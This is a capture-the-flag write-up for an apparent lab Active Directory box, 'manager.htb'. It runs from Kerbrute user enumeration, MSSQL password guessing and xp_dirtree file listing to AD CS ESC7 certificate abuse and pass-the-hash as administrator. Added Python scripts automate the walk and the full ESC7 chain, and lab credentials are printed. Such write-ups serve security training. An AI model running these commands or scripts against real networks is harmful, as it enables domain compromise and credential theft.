Initial Access
First, we run an Nmap TCP scan with default scripts and version detection to discover which ports are open
nmap -sC -sV -Pn <target ip>
The Nmap scan revealed numerous open ports. Initially, I attempted manual enumeration of the website (source code, Gobuster, etc.), but since it is a static website, I didn’t find anything interesting
The open services (Kerberos, LDAP, SMB) show that this is an Active Directory domain controller, so I added manager.htb and dc01.manager.htb to my /etc/hosts file
Kerberos is open, so let's see if we can enumerate valid domain users with Kerbrute
kerbrute userenum -d manager.htb --dc <target ip> /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt
Kerbrute found several valid usernames. Let's put them in a file named user.txt
Now that we have a list of usernames, I tried other Kerberos attacks, but nothing worked. The Nmap scan also shows MSSQL open on port 1433, so let's see what we can do with it.
Doing some research, I found that Metasploit has a module that brute-forces MSSQL logins: auxiliary/scanner/mssql/mssql_login
USER_AS_PASS makes it try each username as its own password, and USE_WINDOWS_AUTHENT makes it authenticate with Windows (domain) accounts instead of SQL logins
use auxiliary/scanner/mssql/mssql_login
set rhosts <target ip>
set user_file user.txt
set USER_AS_PASS true
set USE_WINDOWS_AUTHENT true
set verbose false
exploit
The module finds that the user operator is using operator as their password
Let's connect to the MSSQL database with Impacket's mssqlclient.py, using Windows authentication
impacket-mssqlclient -port 1433 manager/operator:operator@<target ip> -windows-auth
I found a useful command on StackOverflow involving xp_dirtree, an extended stored procedure that lists the contents of a directory on the SQL server's filesystem. Its arguments are the path, the recursion depth, and a flag that includes files as well as subdirectories
Let's try it out
EXEC MASTER.sys.xp_dirtree 'C:\', 1, 1
Indeed, it works! We can see the contents of the C:\ directory. Now it's time to enumerate the filesystem
After some enumeration, I found that C:\inetpub\wwwroot contains a zip file with a backup of the website
EXEC MASTER.sys.xp_dirtree 'C:\inetpub\wwwroot\', 1, 1
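The listings above are one directory at a time. xp_dirtree returns rows of (subdirectory, depth, file) without the parent path, so a deep listing (depth greater than 1) cannot be reliably turned back into full paths. The walker below, an added example that is not code from the original write-up, issues one depth-1 query per directory, rebuilds full paths itself, and filters for extensions that tend to hold backups, configs or secrets. The impacket_query helper assumes Impacket's tds.MSSQL API (an assumption; the write-up only shows the mssqlclient.py front end), and FAKE_FS is a constructed sample tree, not real output from the target.

```python
"""Recursive xp_dirtree walk with an extension filter (added example)."""
import re
from typing import Callable, Dict, Iterator, List, Tuple

Row = Dict[str, object]                # one xp_dirtree result row
QueryFn = Callable[[str], List[Row]]   # runs a SQL statement, returns its rows

INTERESTING = re.compile(r"\.(zip|bak|old|xml|config|ini|txt|kdbx)$", re.IGNORECASE)


def dirtree_sql(path: str) -> str:
    """Build a depth-1, files-included xp_dirtree call for path (quotes escaped)."""
    if path.endswith(":"):          # 'C:' alone means the cwd on C:, not the root
        path += "\\"
    return "EXEC master.sys.xp_dirtree '%s', 1, 1" % path.replace("'", "''")


def walk(query: QueryFn, root: str, max_depth: int = 4) -> Iterator[str]:
    """Yield the full path of every file under root, at most max_depth levels down."""
    todo: List[Tuple[str, int]] = [(root.rstrip("\\"), 0)]
    while todo:
        parent, depth = todo.pop()
        for row in query(dirtree_sql(parent)):
            child = parent + "\\" + str(row["subdirectory"])
            if int(row["file"]) == 1:
                yield child
            elif depth + 1 < max_depth:
                todo.append((child, depth + 1))


def find_interesting(query: QueryFn, root: str = "C:", max_depth: int = 4) -> List[str]:
    """Sorted list of files whose extension suggests backups, configs or secrets."""
    return sorted(p for p in walk(query, root, max_depth) if INTERESTING.search(p))


# Constructed sample tree standing in for the target's disk (not real output).
FAKE_FS: Dict[str, List[Tuple[str, int]]] = {
    "C:": [("inetpub", 0), ("Users", 0), ("Windows", 0)],
    "C:\\inetpub": [("wwwroot", 0), ("logs", 0)],
    "C:\\inetpub\\wwwroot": [("css", 0), ("index.html", 1),
                             ("website-backup-27-07-23-old.zip", 1)],
    "C:\\inetpub\\wwwroot\\css": [("style.css", 1)],
    "C:\\Users": [("Public", 0)],
    "C:\\Users\\Public": [("notes.txt", 1)],
}


def fake_query(sql: str) -> List[Row]:
    """Answer a depth-1 xp_dirtree query from FAKE_FS the way the server would."""
    m = re.fullmatch(r"EXEC master\.sys\.xp_dirtree '(.*)', 1, 1", sql)
    path = m.group(1).replace("''", "'").rstrip("\\")
    return [{"subdirectory": n, "depth": 1, "file": f} for n, f in FAKE_FS.get(path, [])]


def impacket_query(host: str, user: str, password: str, domain: str) -> QueryFn:
    """Real backend (assumed API): Impacket's MSSQL client with Windows auth."""
    from impacket.tds import MSSQL     # assumption: impacket is installed
    conn = MSSQL(host, 1433)
    conn.connect()
    if not conn.login(None, user, password, domain, None, True):
        raise RuntimeError("MSSQL login failed")

    def run(sql: str) -> List[Row]:
        conn.sql_query(sql)
        return list(conn.rows)         # assumption: rows are dicts keyed by column name
    return run


if __name__ == "__main__":
    # Offline demo against the constructed tree; swap in impacket_query(...) for a live target.
    for found in find_interesting(fake_query):
        print(found)
```

Against a live target, replace fake_query with impacket_query("<target ip>", "operator", "operator", "manager"); the walk stops descending at max_depth, so raise it for a deeper sweep once the interesting top-level directories are known.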
Because it sits in the web root, we can download it over HTTP with wget from our attacking machine
wget http://<target ip>/website-backup-27-07-23-old.zip
Let's see if it contains anything juicy. I'll create a folder named website and unzip the archive into it
mkdir website
cd website
unzip ../website-backup-27-07-23-old.zip
With ls -la, we can see a hidden file named .old-conf.xml, which seems interesting
cat .old-conf.xml
It contains credentials for the user raven: R4v3nBe5tD3veloP3r!123
We can log in with Evil-WinRM as raven and grab the user flag
evil-winrm -i <target ip> -u raven -p 'R4v3nBe5tD3veloP3r!123'
Privilege Escalation
I always start post-exploitation with some manual enumeration
First, let's enumerate the groups our user belongs to
whoami /groups
User raven is a member of the Certificate Service DCOM Access group, whose members are allowed to connect to the Certification Authorities in the forest
A quick search for "certificate service dcom exploit" led me to this HackTricks post
The article lists several attack paths, and we need to find which one applies here
To do so we can use Certipy and BloodHound
First, we run the Certipy command from the HackTricks post. Do not forget the -old-bloodhound flag, otherwise the output will not be compatible with the current version of BloodHound
certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip>
This generates a JSON file (alongside the text and BloodHound output) that we can read. The file is very long, so we grep for ESC to see which vulnerabilities Certipy flagged
cat 20231024130019_Certipy.json | grep "ESC"
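grep only shows the ESC lines without the CA or template they belong to. The helper below, an added example that is not part of the original write-up, walks the JSON and pairs each finding with its object. It assumes the layout Certipy 4.x writes (top-level "Certificate Authorities" and "Certificate Templates" dictionaries keyed by index, each entry carrying a "[!] Vulnerabilities" dictionary keyed ESC1..ESC8); that layout is an assumption here, and SAMPLE is a constructed stand-in, not the real 20231024130019_Certipy.json.

```python
"""Summarise Certipy find output: which CA or template has which ESC (added example)."""
import json
from typing import List, Tuple

VULN_KEY = "[!] Vulnerabilities"   # assumption: key Certipy 4.x uses per entry

# Which sections to scan and which field names the entry inside each section.
SECTIONS = (
    ("Certificate Authorities", "CA Name", "CA"),
    ("Certificate Templates", "Template Name", "Template"),
)


def esc_findings(report: dict) -> List[Tuple[str, str, str]]:
    """Return (kind, name, ESCn) for every flagged CA or template, ESC order first."""
    found = []
    for section, name_key, kind in SECTIONS:
        for entry in report.get(section, {}).values():
            for esc in entry.get(VULN_KEY, {}):
                found.append((kind, str(entry.get(name_key, "?")), esc))
    return sorted(found, key=lambda t: (int(t[2][3:]) if t[2][3:].isdigit() else 99, t[0], t[1]))


def findings_from_file(path: str) -> List[Tuple[str, str, str]]:
    """Load a Certipy JSON report from disk and summarise it."""
    with open(path, "r", encoding="utf-8") as fh:
        return esc_findings(json.load(fh))


# Constructed sample in the assumed layout; not the actual report from the box.
SAMPLE = json.dumps({
    "Certificate Authorities": {
        "0": {
            "CA Name": "manager-DC01-CA",
            "DNS Name": "dc01.manager.htb",
            VULN_KEY: {"ESC7": "'MANAGER.HTB\\Raven' has dangerous permissions"},
        }
    },
    "Certificate Templates": {
        "0": {"Template Name": "User", "Enabled": True},
        "1": {"Template Name": "SubCA", "Enabled": True},
    },
})


if __name__ == "__main__":
    for kind, name, esc in esc_findings(json.loads(SAMPLE)):
        print(f"{esc}: {kind} {name}")
```

Run findings_from_file("20231024130019_Certipy.json") on the real report to get the same one-line-per-finding view.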
Great! Now we know which attack we need for privilege escalation
We will use ESC7, attack 2 from the HackTricks page: make raven a certificate officer, request a SubCA certificate for the administrator UPN, approve the pending request ourselves, then retrieve it. There is a cleanup timer on the box, so you need to execute all of these commands quickly one after another; I suggest typing them out beforehand, otherwise the last command will fail. Note that certipy req asks whether to save the private key: answer yes, because the retrieve step needs the <request id>.key file. The request ID (13 in my run) is printed by certipy req, so use the ID from your own output in the next two commands
These will be all my commands
certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip> -ca 'manager-DC01-CA' -add-officer 'raven'
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13
certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'
In the screenshot you can see that I got the error KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type). If you get this error, or you were not fast enough and end up with a clock error, sync your clock with the DC and rerun the retrieve and auth steps:
sudo ntpdate -s manager.htb
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13
certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'
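Because the chain is time-sensitive and the request ID changes from run to run, it helps to script the whole sequence. The driver below is an added example, not code from the original write-up: it shells out to the same certipy commands shown above, answers certipy's "save the private key?" prompt with y so that the <id>.key file exists for the retrieve step, parses the "[*] Request ID is N" line instead of hard-coding 13, and pulls the NT hash out of the certipy auth output. It assumes certipy 4.x is on PATH and prints those two lines in that format, and the caller must supply the target IP (the write-up only shows <target ip>). Only the two parsers run offline; the attack itself runs only when you invoke the script with an IP.

```python
"""Drive the ESC7 attack-2 chain end to end (added example)."""
import re
import subprocess
import sys
from typing import List, Optional

USER = "raven@manager.htb"
PASS = "R4v3nBe5tD3veloP3r!123"
CA = "manager-DC01-CA"
DC_HOST = "dc01.manager.htb"

# Assumed certipy output formats: "[*] Request ID is 13" and
# "[*] Got hash for 'administrator@manager.htb': <lm>:<nt>".
REQ_ID_RE = re.compile(r"Request ID is (\d+)")
NT_HASH_RE = re.compile(r"Got hash for '([^']+)': ([0-9a-f]{32}):([0-9a-f]{32})", re.IGNORECASE)


def parse_request_id(output: str) -> Optional[int]:
    """Request ID from `certipy req` output, or None if the request was not accepted."""
    m = REQ_ID_RE.search(output)
    return int(m.group(1)) if m else None


def parse_nt_hash(output: str) -> Optional[str]:
    """NT hash from `certipy auth` output, or None on PKINIT failure."""
    m = NT_HASH_RE.search(output)
    return m.group(3) if m else None


def certipy(args: List[str], stdin: str = "") -> str:
    """Run one certipy command, feeding stdin for its prompts; return stdout+stderr."""
    proc = subprocess.run(["certipy", *args], input=stdin, capture_output=True,
                          text=True, check=False)
    return proc.stdout + proc.stderr


def esc7_attack2(target_ip: str, upn: str = "administrator@manager.htb") -> str:
    """Officer -> request -> approve -> retrieve -> PKINIT; returns the NT hash."""
    creds = ["-username", USER, "-password", PASS]
    # 1. Manage CA right lets raven add itself as a certificate officer.
    certipy(["ca", "-u", USER, "-p", PASS, "-dc-ip", target_ip, "-ca", CA,
             "-add-officer", "raven"])
    # 2. SubCA request for the admin UPN is denied but left pending; save the key.
    out = certipy(["req", *creds, "-ca", CA, "-target", DC_HOST,
                   "-template", "SubCA", "-upn", upn], stdin="y\n")
    req_id = parse_request_id(out)
    if req_id is None:
        raise RuntimeError("certipy req printed no request ID:\n" + out)
    # 3. As officer, approve our own pending request, then 4. retrieve the cert.
    certipy(["ca", "-ca", CA, "-issue-request", str(req_id), *creds])
    certipy(["req", *creds, "-ca", CA, "-target", DC_HOST, "-retrieve", str(req_id)])
    # 5. PKINIT with the administrator certificate yields the NT hash.
    out = certipy(["auth", "-pfx", "administrator.pfx", "-dc-ip", target_ip,
                   "-username", "administrator", "-domain", "manager.htb"])
    nt = parse_nt_hash(out)
    if nt is None:
        raise RuntimeError("certipy auth returned no hash (clock skew? sync with "
                           "ntpdate and rerun the retrieve/auth steps):\n" + out)
    return nt


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: esc7_chain.py <target ip>")
    print("administrator NT hash:", esc7_attack2(sys.argv[1]))
```

Sync your clock with the DC before running it (the same ntpdate step as above), since the PKINIT step is the one that fails on skew.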
certipy auth prints the administrator's NT hash, so we can pass the hash with Evil-WinRM
evil-winrm -i <target ip> -u administrator -H <administrator hash>